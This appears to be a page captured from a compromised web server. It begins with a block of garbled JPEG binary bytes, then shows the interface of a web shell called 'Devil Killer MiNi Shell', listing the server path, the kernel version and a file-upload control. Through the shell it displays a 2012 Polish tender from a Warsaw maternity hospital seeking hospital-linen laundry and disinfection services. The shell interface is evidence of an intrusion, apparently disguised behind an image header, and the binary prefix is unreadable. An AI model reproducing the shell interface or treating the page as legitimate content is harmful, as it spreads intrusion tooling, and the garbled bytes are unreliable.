JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120224/45017-N-2012.html

<p class="kh_header"><b>Warszawa: P5PRANIE2012na świadczenie usługi prania, prasowania i dezynfekcji bielizny szpitalnej, ubrań lekarskich i innych używanych w Szpitalu</b><br>
<b>Numer ogłoszenia: 45017 - 2012; data zamieszczenia: 24.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ginekologiczno-Położniczy "INFLANCKA" Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Inflancka 6, 00-189 Warszawa, woj. mazowieckie, tel. 022 831-37-01, faks 635 84 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sekretariat@szpital-inflancka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P5PRANIE2012na świadczenie usługi prania, prasowania i dezynfekcji bielizny szpitalnej, ubrań lekarskich i innych używanych w Szpitalu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usługi prania, dezynfekcji i prasowania bielizny szpitalnej, ubrań lekarskich, fartuchów i innej używanej odzieży ochronnej oraz koców, zasłon, firan i innego asortymentu używanego w Szpitalu zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.
2.Szczegółowy przedmiot zamówienia został przedstawiony w formularzu cenowym (specyfikacji cenowej) - Załącznik nr 2 do SIWZ. Asortyment określony w Załączniku nr 2 nazywany jest w SIWZ bielizną szpitalną.
3.Zakres ilościowy i asortyment wykonywanej usługi będzie uzależniony od bieżących potrzeb Zamawiającego. Podane ilości w formularzy cenowym (specyfikacji cenowej) - Załącznik nr 2, mają charakter szacunkowy i mogą ulec zmianie (zwiększyć lub zmniejszyć się).
4.Usługa obejmuje:
a)Odbiór brudnej bielizny szpitalnej przez Wykonawcę z siedziby Zamawiającego (z miejsca przez niego wskazanego) zgodnie z podanym w pkt 5 Harmonogramem usług;
b)Transport brudnej bielizny szpitalnej samochodem zamykanym i przeznaczonym tylko do transportu brudnej bielizny. W wyjątkowych przypadkach, kiedy transport odbywa się jednym samochodem, najpierw dowożona jest czysta bielizna szpitalna, następnie zabierana brudna. Przed ponownym skierowaniem samochodu z czystą bielizną szpitalną, ma być on ponownie zdezynfekowany przez Wykonawcę;
c)Pranie, dezynfekcja i prasowanie bielizny szpitalnej w siedzibie (pralni) Wykonawcy - miejscu wykonywania usługi;
d)Pranie brudnej bielizny szpitalnej wg procedur dostosowanych do stanu zabrudzenia i gwarantujących wysoką jakość wypranego asortymentu (zarówno pod względem bakteriologicznym, jak i higienicznym);
e)Zagwarantowanie przez Wykonawcę, iż bielizna szpitalna pochodząca od Zamawiającego nie będzie mieszana z bielizną z innych placówek;
f)Pranie bielizny skażonej w oddzieleniu od pozostałej bielizny, w wydzielonych pralnicach;
g)Pranie bielizny noworodkowej w oddzieleniu od pozostałej bielizny, w wydzielonych pralnicach;
h)Dezynfekowanie bielizny szpitalnej odpowiednimi preparatami dezynfekcyjnymi zgodnie z właściwymi zaleceniami stosowanymi w zakładach opieki zdrowotnej;
i)Stosowanie odpowiednich środków w procesie prania, dezynfekcji i wybielania bielizny szpitalnej, nie niszczących tkanin, nie zawierających fosforanów oraz przeznaczonych do stosowania w zakładach opieki zdrowotnej, a dodatkowo - w przypadku bielizny noworodkowej - posiadających dokumentację potwierdzającą możliwości stosowania tego środka do prania i chemiczno - termicznej dezynfekcji bielizny noworodkowej - pozytywna opinia upoważnionych jednostek certyfikujących;
j)Pakowanie upranej i uprasowanej bielizny szpitalnej oddzielnie - asortymentowo:
- bielizna noworodkowa zafoliowana oddzielnie;
- bielizna płaska zafoliowana oddzielnie;
- ubrania lekarskie (garsonki, fartuchy i inne), po dokładnym uprasowaniu, zawieszone na wieszakach i zabezpieczone folią;
- pozostały asortyment zapakowany oddzielnie asortymentowo (rodzaj opakowania: worek i lub folia zależnie od asortymentu).
k)Dostarczenie przez Wykonawcę czystej upranej, zdezynfekowanej i uprasowanej bielizny szpitalnej, odpowiednio zabezpieczonej (opakowanej) do siedziby Zamawiającego (do miejsca przez niego wskazanego) na koszt i ryzyko Wykonawcy;
l)Każdorazowe potwierdzenie przekazania i odbioru bielizny szpitalnej na druku, podpisanym przez upoważnionych przedstawicieli stron (wzór protokołu zdawczo - odbiorczego będzie stanowić załącznik do umowy - Spis bielizny oddanej do pralni);
m)Dostarczania badań mikrobiologicznych oceniających skuteczność dezynfekcji w procesie, które muszą być wykonywane nie rzadziej niż raz na kwartał i bez dodatkowego wezwania przedstawione Zamawiającemu.
5.Harmonogram usług:
a)Świadczenie usługi odbywać się będzie minimum jeden raz dziennie - codziennie od poniedziałku do piątku, poza dniami świątecznymi;
b)Odbiór brudnej bielizny szpitalnej (w workach koloru żółtego) odbywać się będzie do godziny 12:00;
c)Zwrot czystej bielizny szpitalnej (w workach koloru zielonego i/lub zapakowanej w sposób określony w ust. 4 pkt. j.) odbywać się będzie do godziny 13:00;
d)Brudna bielizna szpitalna odbierana od Zamawiającego w piątek, winna być dostarczona czysta do Szpitala w poniedziałek do godziny 10:00;
e)Odbiór i zwrot ubrań lekarskich (garsonki, fartuchy i inne) odbywać się będzie trzy razy w tygodniu: w każdy poniedziałek, środę i piątek. Maksymalny czas prania, dezynfekcji i prasowania ubrań lekarskich wynosi 48 godzin. Ubrania lekarskie odbierane od Zamawiającego w piątek, winny być dostarczone czyste do Szpitala w poniedziałek;
f)Maksymalny czas prania, dezynfekcji i prasowania bielizny szpitalnej wynosi 24 godziny (z zastrzeżeniem pkt. e.);
g)W razie braku czystej bielizny szpitalnej w Szpitalu, w sytuacjach awaryjnych, Wykonawca może być poproszony telefonicznie o wcześniejszy zwrot upranego, zdezynfekowanego i uprasowanego asortymentu tzn. w ciągu 4 godzin.
6.Wykonawca ponosi dodatkowo koszty związane z:
a)transportem (w tym zabezpieczeniem bielizny szpitalnej) na czas transportu - w opakowaniach jednorazowych zwyczajowo przyjętych do tego typu towaru;
b)naprawą uszkodzonej bielizny szpitalnej;
c)odkupieniem zagubionej i zniszczonej bielizny szpitalnej.
7.Postępowanie z bielizną szpitalną nienależycie upraną oraz zagubioną i uszkodzoną:
a)Zamawiający zastrzega sobie prawo do odmówienia przyjęcia bielizny szpitalnej nienależycie upranej lub uprasowanej, a także bielizny uszkodzonej, jeżeli uszkodzenie wynikło z nienależytego spełnienia przez Wykonawcę warunków dotyczących prania, dezynfekcji, wybielania lub prasowania bielizny;
b)W przypadku nienależytego wykonania usługi Wykonawca zobowiązany jest dokonać na własny koszt ponownego prania bielizny szpitalnej i dostarczenia jej do siedziby Zamawiającego w ciągu 24 godzin;.
c)Wykonawca ponosi odpowiedzialność za bieliznę szpitalną uszkodzoną w czasie prania, dezynfekcji i prasowania (i maglowania), jak również w czasie transportu. Jeśli uszkodzenie ze względów funkcjonalnych lub estetycznych nie pozwala na dalsze użytkowanie bielizny szpitalnej, Wykonawca ponosi koszty związane z jej odkupieniem;
d)Bielizna szpitalna, która podczas prania uległa uszkodzeniu będzie naprawiona przez Wykonawcę, a w przypadku trwałego uszkodzenia lub zagubienia przez Wykonawcę - Zamawiający ma prawo żądać zwrotu pieniędzy lub odkupienia identycznej bielizny (zaakceptowanej przez Zamawiającego) w terminie 14 dni od zgłoszenia tego faktu na piśmie - zgodnie z Wyceną bielizny szpitalnej stanowiącą Załącznik nr 2 do niniejszej umowy. Podane w Wycenie bielizny szpitalnej ceny będą obowiązywały przez cały czas trwania umowy;
e)Wykonawca powinien oddzielić rzeczy uszkodzone i naprawić je tzn. przeszyć na maszynie szwem ciągłym, naprawić szwy boczne, zszyć rozdarte części bielizny, wszyć suwak, uzupełnić troki, napy i guziki ponosząc koszty potrzebnych użytych materiałów;
f)Stwierdzone braki ilościowe w wykonanej usłudze winny być uzupełnione przez Wykonawcę w ciągu 3 dni od momentu zgłoszenia przez Zamawiającego;
g)Zamawiający musi zawiadomić Wykonawcę pisemnie w ciągu 7 dni od daty odbioru towaru o ewentualnych widocznych uszkodzeniach lub zniszczeniach oraz brakach ilościowych w wykonanej usłudze.
8.Wymagania w stosunku do Wykonawcy:
a)Pralnia, w której będą wykonywane usługi musi posiadać zezwolenie właściwego organu sanitarno - epidemiologicznego na pranie bielizny szpitalnej i spełniać wymagania określone w Rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz..U. z 2011 r. Nr 31 poz. 158);
b)Preparaty stosowane przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej muszą posiadać atesty PZH, a dodatkowo- w przypadku bielizny noworodkowej - pozytywną opinię upoważnionych jednostek certyfikujących (dołączone do oferty). Dodatkowo wykonawca powinien załączyć do oferty Wykaz środków stosowanych przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 8 do SIWZ);
c)Transport bielizny szpitalnej musi odbywać się zgodnie z zapisami pkt. 4 lit. b), a Wykonawca powinien załączyć do oferty Wykaz środków transportu i urządzeń wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 7 do SIWZ). Do Wykazu należy dołączyć opinie sanitarne dla wymienionych środków transportu;
d)Wykonawca winien dostarczyć wraz z ofertą, Wykaz zrealizowanych zamówień tj. wykonanych przez Wykonawcę w okresie ostatnich trzech lat licząc wstecz przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, zamówień polegających na usłudze prania, dezynfekcji i prasowania bielizny szpitalnej, ubrań lekarskich i innych używanych w szpitalach, o wartości nie mniejszej niż 225.000,00 zł brutto każde (w wykazie należy podać co najmniej dwa zamówienia polegające na usłudze prania, dezynfekcji i prasowania bielizny szpitalnej, ubrań lekarskich i innych używanych w szpitalach, o wartości nie mniejszej niż 225.000,00 zł brutto każde). Do Wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje wydane przez zamawiających, u których wykonywana była usługa);
e)Badania mikrobiologiczne oceniające skuteczność dezynfekcji w procesie muszą być wykonywane przez Wykonawcę nie rzadziej niż raz na kwartał, bez dodatkowego wezwania i przedłożone Zamawiającemu. 
9.Sposób rozliczeń pomiędzy Zamawiającym a Wykonawcą:
a)Należność za usługę regulowana będzie na podstawie faktur wystawionych przez Wykonawcę (na koniec miesiąca);
b)Podstawą wystawienia przez Wykonawcę faktury jest podpisany przez obie strony protokół zdawczo - odbiorczy (miesięczny zbiorczy), uwzględniający usługi wykonane w ciągu danego miesiąca;
c)Ustala się miesięczny okres rozliczeniowy;
d)Wykonawca wystawia fakturę w terminie do 7 dni od zakończenia okresu rozliczeniowego;
e)Płatność za wykonaną usługę następować będzie na konto Wykonawcy w terminie minimum 30 dni od daty otrzymania przez Zamawiającego faktury (zbiorczej za cały miesiąc).
10.Zamawiający:
a)Zobowiązany jest do oznakowania każdej sztuki bielizny szpitalnej, w sposób identyfikujący Zamawiającego i nie powodujący zmycia oznakowania w procesie świadczenia usługi;
b)Nie gwarantuje każdorazowego wjazdu na teren Szpitala;
c)Zamawiającemu przysługuje prawo kontroli warunków i standardów realizowanej przez Wykonawcę usługi, w tym swobodny dostęp do miejsca wykonywania usługi.
11.Miejsce odbioru i dostawy bielizny szpitalnej objętej zamówieniem: Szpital Ginekologiczno -Położniczy INFLANCKA im. Krysi Niżyńskiej Zakurzonej  SPZOZ, 00-189 Warszawa, ul. Inflancka 6.  
12.Nazwa i kod Wspólnego Słownika Zamówień (CPV): 98.39.00.00-3; 98.31.50.00-4; 98.31.20.00-3; 98.31.10.00-6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia wybranemu Wykonawcy zamówień uzupełniających, o których mowa w art. 67 ust 1 pkt 6 ustawy Prawo zamówień publicznych do 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 98.31.50.00-4, 98.31.20.00-3, 98.31.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający żąda wykazania i złożenia wraz z ofertą:
aktualne zezwolenie właściwego organu sanitarno - epidemiologicznego dla pralni, w której będą wykonywane usługi.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający żąda wykazania i złożenia wraz z ofertą:
wykaz zrealizowanych zamówień tj. wykonanych przez Wykonawcę w okresie ostatnich trzech lat licząc wstecz przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, zamówień polegających na usłudze prania, dezynfekcji i prasowania bielizny szpitalnej, ubrań lekarskich i innych używanych w szpitalach, o wartości nie mniejszej niż 225.000,00 zł brutto każde (w wykazie należy podać co najmniej dwa zamówienia polegające na usłudze prania, dezynfekcji i prasowania bielizny szpitalnej, ubrań lekarskich i innych używanych w szpitalach, o wartości nie mniejszej niż 225.000,00 zł brutto każde). Do Wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje wydane przez zamawiających, u których wykonywana była usługa)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający żąda wykazania i złożenia wraz z ofertą:
a)Na preparaty stosowane przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej - aktualne atesty PZH, a dodatkowo - w przypadku bielizny noworodkowej - pozytywna opinia upoważnionych jednostek certyfikujących. Dodatkowo wykonawca powinien załączyć do oferty Wykaz środków stosowanych przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 8 do SIWZ);
b)Wykaz środków transportu i urządzeń wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 7 do SIWZ). Do Wykazu należy dołączyć opinie sanitarne dla wymienionych środków transportu;
c)Oświadczenie o spełnianiu wymagań określonych w Rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz..U. z 2011 r. Nr 31 poz. 158).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający żąda wykazania i złożenia wraz z ofertą:
a)Na preparaty stosowane przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej - aktualne atesty PZH, a dodatkowo - w przypadku bielizny noworodkowej - pozytywna opinia upoważnionych jednostek certyfikujących. Dodatkowo wykonawca powinien załączyć do oferty Wykaz środków stosowanych przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 8 do SIWZ);
b)Wykaz środków transportu i urządzeń wykorzystywanych do realizacji zamówienia (wg wzoru stanowiącego Załącznik nr 7 do SIWZ). Do Wykazu należy dołączyć opinie sanitarne dla wymienionych środków transportu;
c)Oświadczenie o spełnianiu wymagań określonych w Rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz..U. z 2011 r. Nr 31 poz. 158).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, opisanych w § 17 pkt. 1 SIWZ, Zamawiający żąda złożenia następujących dokumentów:
a. Oświadczenie o spełnianiu warunków określonych art. 22 ust. 1 ustawy Pzp (wg wzoru Załącznik nr 3 do SIWZ);
b. W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, zamawiający żąda złożenia oświadczenia Wykonawcy, z którego będzie wynikało, że Wykonawca spełnia wymagania określone w Rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz..U. z 2011 r. Nr 31 poz. 158).
c. Wykaz zrealizowanych zamówień (według wzoru Załącznik nr 6 do SIWZ);
d. Dokumenty potwierdzające, iż zamówienia wskazane w Wykazie zrealizowanych zamówień zostały wykonane należycie (np. referencje wydane przez zamawiających, u których wykonywana była usługa);
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp Zamawiający żąda złożenia następujących dokumentów:
a. Oświadczenie o braku podstaw do wykluczenia (według wzoru Załącznik nr 4 do SIWZ);
b. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert, a stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp.

3. Ponad to Wykonawca ma złożyć:
a. Formularz ofertowy (według wzoru Załącznik nr 1 do SIWZ);
b. Formularz cenowy - specyfikacja cenowa (według wzoru Załącznik nr 2 do SIWZ);
c. Wykaz środków transportu i urządzeń wykorzystywanych do realizacji zamówienia (wg wzoru Załącznik nr 7 do SIWZ) wraz z opinią sanitarną wydaną przez Państwowy Inspektorat Sanitarno - Epidemiologiczny dotyczącą środków transportu;
d. Aktualne opinie sanitarne dla wymienionych środków transportu;
e. Wykaz środków stosowanych przez Wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej wykorzystywanych do realizacji zamówienia (wg wzoru Załącznik nr 8 do SIWZ);
f. Atesty PZH dla preparatów stosowanych przez wykonawcę w procesie prania, dezynfekcji i wybielania bielizny szpitalnej, a dodatkowo - w przypadku bielizny noworodkowej - pozytywna opinia upoważnionych jednostek certyfikujących;
g. Opinia sanitarna wydana przez Państwowy Inspektorat Sanitarno - Epidemiologiczny w oparciu o przeprowadzone kontrole, że pralnia posiada barierę higieniczną i spełnia wymagania w zakresie prania bielizny dla jednostek służby zdrowia zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 02 lutego 2011 r. (Dz.U. z 2011 r. nr 31 poz. 158);
h. Oświadczenie Wykonawcy, że pomieszczenia i urządzenia Pralni odpowiadają wymogom formalnym i sanitarnym określonym w Rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r., w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz.U. z 2011 r. Nr 31 poz. 158);
